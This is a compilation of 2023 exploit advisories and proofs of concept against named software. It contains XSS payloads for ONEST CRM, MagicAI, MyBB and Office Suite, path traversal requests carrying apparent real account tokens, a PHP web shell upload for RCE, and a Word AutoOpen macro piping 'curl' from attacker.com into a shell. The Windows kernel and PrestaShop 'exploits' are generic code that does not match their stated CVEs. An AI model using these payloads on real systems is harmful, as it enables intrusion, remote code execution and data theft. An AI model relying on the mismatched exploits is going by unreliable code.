<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://onesttech.com/details/crm │<br />│ Vendor : Onest Tech │<br />│ Software : ONEST CRM 1.0 - Customer Relationship Management System Software │<br />│ Vuln Type: Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Stored XSS<br /><br />------------------------------------------------------------<br />POST /admin/project/update/2 HTTP/2<br /><br />Content-Disposition: form-data; name="name"<br /><br /><script>alert(1)</script><br />------------------------------------------------------------<br /><br />POST parameter 'name' is vulnerable to XSS<br /><br /><br />## Steps to Reproduce:<br /><br />1. Login (as Client) "Normal User"<br />2. Go to [Project List] on this Path (https://website/admin/project)<br />3. Select any Project Click on the ... then Select [Edit]<br />4. Inject your [XSS Payload] in "Name"<br />5. Scroll Down and Press [Update]<br />6. XSS Will Fire on Client Browser<br /><br />5. When ADMIN Visit the [Project List] to Check the Projects on this Path (https://website/admin/project) in administration Panel<br />6. XSS will Fire & Executed on his Browser<br /><br />Note: the Path for [Client Users] and [ADMIN] on the website it looks the same on "/admin/"<br /> but The Client User Panel is Limited & don't show all Administration MENU Options in the Administration Panel to manage the website<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Office Suite Premium 10.9.1.42602 - Local File Inclusion <br /># Date: 06-26-2023<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://www.mobisystems.com/<br /># Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506<br /># Version: Office Suite Premium 10.9.1.42602<br /># Tested on: Ubuntu 18.04<br /><br /><br /># POC<br /><br />GET /../../../../../../../../../../../../../../../etc/hosts HTTP/2<br />Host: connect.mobisystems.com<br />Accept: */*<br />Clv: 42602<br />Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free<br />Accept-Language: tr-TR,tr;q=0.9<br />Accept-Encoding: gzip, deflate<br />App: com.mobisystems.ios.office.free<br />User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0<br />Gdpr: true<br />Account: 234c89ff-7e80-4b64-9d35-8653fe131795<br />Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19<br /><br />Result : <br /><br />127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine <br /><br />Url: https://connect.mobisystems.com/etc/hosts<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: Office Suite Premium 10.9.1.42602 - Path Traversal<br /># Date: 06-26-2023<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://www.mobisystems.com/<br /># Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506<br /># Version: Office Suite Premium 10.9.1.42602<br /># Tested on: Ubuntu 18.04<br /><br /><br /># POC<br /><br />GET /../../../../../../../../../../../../../../../etc/hosts HTTP/2<br />Host: connect.mobisystems.com<br />Accept: */*<br />Clv: 42602<br />Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free<br />Accept-Language: tr-TR,tr;q=0.9<br />Accept-Encoding: gzip, deflate<br />App: com.mobisystems.ios.office.free<br />User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0<br />Gdpr: true<br />Account: 234c89ff-7e80-4b64-9d35-8653fe131795<br />Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19<br /><br />Result : <br /><br />127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine <br /><br />Url: https://connect.mobisystems.com/etc/hosts<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: Office Suite Premium 10.9.1.42602 - Cross-Site Scripting (reflected)<br /># Date: 06-26-2023<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://www.mobisystems.com/<br /># Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506<br /># Version: Office Suite Premium 10.9.1.42602<br /># Tested on: Ubuntu 18.04<br /><br /><br /># POC<br /># Exploit Details : Following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.<br /><br />Request 1: <br /><br />GET /api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-code HTTP/2<br />Host: connect.mobisystems.com<br />Accept: */*<br />Clv: 42602<br />Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free<br />Accept-Language: en_EN,en;q=0.9<br />Accept-Encoding: gzip, deflate<br />App: com.mobisystems.ios.office.free<br />User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0<br />Gdpr: true<br />Account: 234c89ff-7e80-4b64-9d35-8653fe131795<br />Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19<br /><br />Url: https://connect.mobisystems.com/api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-code<br />Payload: <img src=a onerror=alert(1)><br />Parameter : application<br /><br /><br />Request 2 : <br /><br />GET /api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527 HTTP/2<br />Host: connect.mobisystems.com<br />Accept: */*<br />Clv: 42602<br />Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free<br />Accept-Language: en_EN,en;q=0.9<br />Accept-Encoding: gzip, deflate<br />App: com.mobisystems.ios.office.free<br />User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0<br />Lang: en_EN<br />Gdpr: true<br />Account: 234c89ff-7e80-4b64-9d35-8653fe131795<br />Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19<br /><br />URL : https://connect.mobisystems.com/api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527<br />Payload : <img src=a onerror=alert(1)><br />Parameter: id<br /><br />Request 3 : <br /><br />GET /api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=search HTTP/2<br />Host: connect.mobisystems.com<br />Accept: */*<br />Clv: 42602<br />Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free<br />Accept-Language: en_EN,en;q=0.9<br />Accept-Encoding: gzip, deflate<br />App: com.mobisystems.ios.office.free<br />User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0<br />Lang: en_EN<br />Gdpr: true<br />Account: 234c89ff-7e80-4b64-9d35-8653fe131795<br />Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19<br /><br />URL : https://connect.mobisystems.com/api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=search<br />Payload :<img src=a onerror=alert(1)><br />Parameter: filter<br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://magicai.liquid-themes.com/ │<br />│ Vendor : MagicAI │<br />│ Software : MagicAI 1.55R │<br />│ Vuln Type: Stored XSS via File Upload │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Steps to Reproduce:<br /><br />1. Go to [Settings] on this Path (https://website/dashboard/user/settings)<br />2. Upload any Image in Avatar to capture the request in Burp Suite<br />3. Replace image.png with image.svg in [filename] and add this SVG with HTML Included<br /><br />----------------------------------------------------------------------------------------<br />POST /dashboard/user/settings/save HTTP/2<br /><br />Content-Disposition: form-data; name="avatar"; filename="image.svg"<br />Content-Type: image/png<br /><br /><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 96 105"><br /><html><head><title>test</title></head><body><script>alert('xss');</script></body></html><br /></svg><br />----------------------------------------------------------------------------------------<br /><br />4. Send the Request<br />5. Back to the Path (https://website/dashboard/user/settings)<br />6. Refresh the Page<br />7. Capture the Link of your Uploaded svg in [Burp Logger] GET (https://website/upload/images/avatar/****-culote-mia-avatar.svg)<br />8. Send SVG Link to Victims<br />9. XSS Executed!<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074)<br />64-bit Remote Code Execution Vulnerability<br />## Author: nu11secur1ty<br />## Date: 04.17.2023<br />## Vendor: https://www.microsoft.com/<br />## Software: https://www.microsoft.com/en-us/microsoft-365/<br />## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/<br />## CVE-2023-28285<br /><br /><br />## Description:<br />The attack itself is carried out locally by a user with authentication<br />to the targeted system. An attacker could exploit the vulnerability by<br />convincing a victim, through social engineering, to download and open<br />a specially crafted file from a website which could lead to a local<br />attack on the victim's computer. The attacker can trick the victim to<br />open a malicious web page by using a malicious `Word` file for<br />`Office-365 API`. After the user will open the file to read it, from<br />the API of Office-365, without being asked what it wants to activate,<br />etc, he will activate the code of the malicious server, which he will<br />inject himself, from this malicious server. Emedietly after this<br />click, the attacker can receive very sensitive information! For bank<br />accounts, logs from some sniff attacks, tracking of all the traffic of<br />the victim without stopping, and more malicious stuff, it depends on<br />the scenario and etc.<br />STATUS: HIGH Vulnerability<br /><br />[+]Exploit:<br />The exploit server must be BROADCASTING at the moment when the victim<br />hit the button of the exploit!<br /><br />[+]PoC:<br />```cmd<br />Sub AutoOpen()<br /> Call Shell("cmd.exe /S /c" & "curl -s<br />http://attacker.com/CVE-2023-28285/PoC.debelui | debelui",<br />vbNormalFocus)<br />End Sub<br />```<br /><br />## FYI:<br />The PoC has a price and this report will be uploaded with a<br />description and video of how you can reproduce it only.<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285)<br /><br />## Proof and Exploit<br />[href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)<br /><br />## Time spend:<br />01:30:00<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and<br />https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html<br />https://cxsecurity.com/ and https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code># Exploit Title: MyBB [PGM] Favicon Plugin 1.0 – Cross-Site Scripting<br /># Date: May 2, 2023<br /># Author: 0xB9<br /># Twitter: @0xB9sec<br /># Software Link: https://community.mybb.com/mods.php?action=view&pid=1554<br /># Version: 1.0<br /># Tested On: Windows 10<br /><br />Description:<br /><br />The favicon input in the settings doesn’t sanitize the favicon URL.<br /><br />Proof of Concept:<br /><br />– In the admin dashboard go to Configuration > Settings > Favicon<br />– Enter the following payload in the URL input: “><script>alert(1)</script>.ico<br />– Visit any page on the forum to trigger the payload<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://demo.smartwebinfotech.site/job-board/ │<br />│ Vendor : Smartweb Infotech │<br />│ Software : Job Board 1.0 - Job Portal Management System │<br />│ Vuln Type: Arbitrary File Upload Leads to RCE │<br />│ Impact : Upload PHPshell and execute commands on the server │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ Allow Attacker to overwrite critical files simply by uploading a shell and execute │<br />│ commands on the server │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Steps to Reproduce:<br /><br />1. Go to [My Profile] on this Path (https://website/settings/account)<br />2. Upload any Image to capture the request in Burp Suite<br />3. Replace image.png to upload.php in [filename] and add this simple phpshell<br /><br />POST /job-board/settings/account HTTP/2<br /><br />-----------------------------427088175318086545183087924022<br />Content-Disposition: form-data; name="profile"; filename="shell.php"<br />Content-Type: image/png<br /><br /><?php echo system($_GET['command']); ?><br />-----------------------------427088175318086545183087924022--<br /><br />4. Send the Request<br />5. Back to the Path (https://website/settings/account)<br />6. Refresh the Page<br />7. Copy the Link of (Unloaded Image)<br />8. Paste the Link of your uploaded PHPshell - Path (https://website/storage/upload/profile/shell_1687559183.php?command=id)<br />9. RCE Executed!<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory<br /># Date: 2023-06-20<br /># Dork: /modules/winbizpayment/downloads/download.php<br /># country: Iran<br /># Exploit Author: Amirhossein Bahramizadeh<br /># Category : webapps<br /># Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html<br /># Version: 17.1.3 (REQUIRED)<br /># Tested on: Windows/Linux<br /># CVE : CVE-2023-30198<br /><br />import requests<br />import string<br />import random<br /><br /># The base URL of the vulnerable site<br />base_url = "http://example.com"<br /><br /># The URL of the login page<br />login_url = base_url + "/authentication.php"<br /><br /># The username and password for the admin account<br />username = "admin"<br />password = "password123"<br /><br /># The URL of the vulnerable download.php file<br />download_url = base_url + "/modules/winbizpayment/downloads/download.php"<br /><br /># The ID of the order to download<br />order_id = 1234<br /><br /># The path to save the downloaded file<br />file_path = "/tmp/order_%d.pdf" % order_id<br /><br /># The session cookies to use for the requests<br />session_cookies = None<br /><br /># Generate a random string for the CSRF token<br />csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))<br /><br /># Send a POST request to the login page to authenticate as the admin user<br />login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}<br />session = requests.Session()<br />response = session.post(login_url, data=login_data)<br /><br /># Save the session cookies for future requests<br />session_cookies = session.cookies.get_dict()<br /><br /># Generate a random string for the CSRF token<br />csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))<br /><br /># Send a POST request to the download.php file to download the order PDF<br />download_data = {"id_order": order_id, "csrf_token": csrf_token}<br />response = session.post(download_url, cookies=session_cookies, data=download_data)<br /><br /># Save the downloaded file to disk<br />with open(file_path, "wb") as f:<br /> f.write(response.content)<br /><br /># Print a message indicating that the file has been downloaded<br />print("File downloaded to %s" % file_path)<br /> <br /><br /></code></pre>
<pre><code>// Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation<br />// Date: 2023-06-20<br />// country: Iran<br />// Exploit Author: Amirhossein Bahramizadeh<br />// Category : webapps<br />// Vendor Homepage:<br />// Tested on: Windows/Linux<br />// CVE : CVE-2023-28293<br /><br />#include <windows.h><br />#include <stdio.h><br /><br />// The vulnerable driver file name<br />const char *driver_name = "vuln_driver.sys";<br /><br />// The vulnerable driver device name<br />const char *device_name = "\\\\.\\VulnDriver";<br /><br />// The IOCTL code to trigger the vulnerability<br />#define IOCTL_VULN_CODE 0x222003<br /><br />// The buffer size for the IOCTL input/output data<br />#define IOCTL_BUFFER_SIZE 0x1000<br /><br />int main()<br />{<br /> HANDLE device;<br /> DWORD bytes_returned;<br /> char input_buffer[IOCTL_BUFFER_SIZE];<br /> char output_buffer[IOCTL_BUFFER_SIZE];<br /><br /> // Load the vulnerable driver<br /> if (!LoadDriver(driver_name, "\\Driver\\VulnDriver"))<br /> {<br /> printf("Error loading vulnerable driver: %d\n", GetLastError());<br /> return 1;<br /> }<br /><br /> // Open the vulnerable driver device<br /> device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);<br /> if (device == INVALID_HANDLE_VALUE)<br /> {<br /> printf("Error opening vulnerable driver device: %d\n", GetLastError());<br /> return 1;<br /> }<br /><br /> // Fill the input buffer with data to trigger the vulnerability<br /> memset(input_buffer, 'A', IOCTL_BUFFER_SIZE);<br /><br /> // Send the IOCTL to trigger the vulnerability<br /> if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL))<br /> {<br /> printf("Error sending IOCTL: %d\n", GetLastError());<br /> return 1;<br /> }<br /><br /> // Print the output buffer contents<br /> printf("Output buffer:\n%s\n", output_buffer);<br /><br /> // Unload the vulnerable driver<br /> if (!UnloadDriver("\\Driver\\VulnDriver"))<br /> {<br /> printf("Error unloading vulnerable driver: %d\n", GetLastError());<br /> return 1;<br /> }<br /><br /> // Close the vulnerable driver device<br /> CloseHandle(device);<br /><br /> return 0;<br />}<br /><br />BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name)<br />{<br /> SC_HANDLE sc_manager, service;<br /> DWORD error;<br /><br /> // Open the Service Control Manager<br /> sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);<br /> if (sc_manager == NULL)<br /> {<br /> return FALSE;<br /> }<br /><br /> // Create the service<br /> service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL);<br /> if (service == NULL)<br /> {<br /> error = GetLastError();<br /> if (error == ERROR_SERVICE_EXISTS)<br /> {<br /> // The service already exists, so open it instead<br /> service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);<br /> if (service == NULL)<br /> {<br /> CloseServiceHandle(sc_manager);<br /> return FALSE;<br /> }<br /> }<br /> else<br /> {<br /> CloseServiceHandle(sc_manager);<br /> return FALSE;<br /> }<br /> }<br /><br /> // Start the service<br /> if (!StartService(service, 0, NULL))<br /> {<br /> error = GetLastError();<br /> if (error != ERROR_SERVICE_ALREADY_RUNNING)<br /> {<br /> CloseServiceHandle(service);<br /> CloseServiceHandle(sc_manager);<br /> return FALSE;<br /> }<br /> }<br /><br /> CloseServiceHandle(service);<br /> CloseServiceHandle(sc_manager);<br /> return TRUE;<br />}<br /><br />BOOL UnloadDriver(LPCTSTR service_name)<br />{<br /> SC_HANDLE sc_manager, service;<br /> SERVICE_STATUS status;<br /> DWORD error;<br /><br /> // Open the Service Control Manager<br /> sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);<br /> if (sc_manager == NULL)<br /> {<br /> return FALSE;<br /> }<br /><br /> // Open the service<br /> service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);<br /> if (service == NULL)<br /> {<br /> CloseServiceHandle(sc_manager);<br /> return FALSE;<br /> }<br /><br /> // Stop the service<br /> if (!ControlService(service, SERVICE_CONTROL_STOP, &status))<br /> {<br /> error = GetLastError();<br /> if (error != ERROR_SERVICE_NOT_ACTIVE)<br /> {<br /> CloseServiceHandle(service);<br /> CloseServiceHandle(sc_manager);<br /> return FALSE;<br /> }<br /> }<br /><br /> // Delete the service<br /> if (!DeleteService(service))<br /> {<br /> CloseServiceHandle(service);<br /> CloseServiceHandle(sc_manager);<br /> return FALSE;<br /> }<br /><br /> CloseServiceHandle(service);<br /> CloseServiceHandle(sc_manager);<br /> return TRUE;<br />}<br /> <br /><br /></code></pre>